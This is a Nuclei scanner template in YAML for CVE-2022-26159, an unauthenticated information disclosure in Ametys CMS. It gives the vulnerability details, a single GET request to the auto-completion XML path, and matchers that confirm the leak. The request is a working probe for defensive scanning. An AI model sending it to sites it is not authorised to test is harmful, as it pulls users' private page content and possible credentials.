53 lines
2.0 KiB
YAML
53 lines
2.0 KiB
YAML
id: CVE-2022-26159
|
|
|
|
info:
|
|
name: Ametys CMS Information Disclosure
|
|
author: Remi Gascou (podalirius)
|
|
severity: medium
|
|
description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.
|
|
impact: |
|
|
The vulnerability can lead to the exposure of sensitive data, such as user credentials or system configuration.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Ametys CMS.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-26159
|
|
- https://podalirius.net/en/cves/2022-26159/
|
|
- https://issues.ametys.org/browse/CMS-10973
|
|
- https://github.com/p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML/
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2022-26159
|
|
cwe-id: CWE-425
|
|
epss-score: 0.00606
|
|
epss-percentile: 0.78512
|
|
cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: ametys
|
|
product: ametys
|
|
tags: cve,cve2022,plugin,ametys,cms
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '<auto-completion>'
|
|
- '<item>'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'text/xml'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a0048304602210083dc0ecd9851313a1db6452ab44bf40b17047458eadfe88b70661ce550237121022100e3eb066d716f039b9781bb6c11dbd04a598b39e12c8b89e76455b7f35f37122a:922c64590222798bb761d5b6d8e72950 |